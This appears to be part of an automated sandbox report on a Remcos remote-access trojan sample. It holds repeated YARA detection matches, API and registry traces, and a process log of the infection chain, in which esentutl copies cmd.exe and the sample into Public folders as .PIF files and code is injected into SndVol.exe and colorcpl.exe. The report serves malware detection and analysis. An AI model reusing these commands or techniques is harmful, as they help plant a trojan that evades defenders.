              Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exeBinary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/8@14/3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_2914798D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_0041798D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077E86AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_077E86AA
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C57FD4 GetDiskFreeSpaceA,0_2_02C57FD4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6AD98 CreateToolhelp32Snapshot,0_2_02C6AD98
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C66DC8 CoCreateInstance,0_2_02C66DC8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_2914B539
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_2914AB9E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Resignation-X9RTX9
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: jlPBMMQbXC.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeFile read: C:\Users\user\Desktop\jlPBMMQbXC.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\jlPBMMQbXC.exe "C:\Users\user\Desktop\jlPBMMQbXC.exe"
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: unknownProcess created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "Jump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /oJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: ieframe.dllJump to behavior
